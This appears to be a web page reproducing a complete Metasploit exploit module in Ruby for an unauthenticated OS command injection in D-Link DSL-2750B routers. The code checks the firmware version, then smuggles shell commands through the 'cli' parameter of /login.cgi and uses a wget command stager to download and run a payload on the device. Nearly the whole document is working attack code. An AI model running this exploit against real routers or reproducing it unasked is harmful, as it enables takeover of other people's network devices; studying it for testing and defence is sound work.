扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DSL-2750B OS Command Injection', 'Description'=> %q( This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices. Vulnerability can be exploited through "cli" parameter that is directly used to invoke "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03. ), 'Author' => [ 'p@ql', # vulnerability discovery 'Marcin Bury <marcin[at]threat9.com>' # metasploit module ], 'License'=> MSF_LICENSE, 'References' => [ ['PACKETSTORM', 135706], ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'], ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/'] ], 'Targets'=> [ [ 'Linux mipsbe Payload', { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ] ], 'DisclosureDate'=> 'Feb 5 2016', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::FLAVOR') end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/ayefeaturesconvert.js' ) unless res vprint_error('Connection failed') return CheckCode::Unknown end unless res.code.to_i == 200 && res.body.include?('DSL-2750') vprint_status('Remote host is not a DSL-2750') return CheckCode::Safe end if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/ version = Regexp.last_match[1] vprint_status("Remote host is a DSL-2750B with firmware version #{version}") if version >= "1.01" && version <= "1.03" return Exploit::CheckCode::Appears end end CheckCode::Safe rescue ::Rex::ConnectionError vprint_error('Connection failed') return CheckCode::Unknown end def execute_command(cmd, _opts) payload = Rex::Text.uri_encode("multilingual show';#{cmd}'") send_request_cgi( { 'method' => 'GET', 'uri' => '/login.cgi', 'vars_get' => { 'cli' => "#{payload}$" }, 'encode_params' => false }, 5 ) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server") end def exploit print_status("#{peer} Checking target version...") unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable') end execute_cmdstager( flavor: :wget, linemax: 200 ) end end |
体验盒子
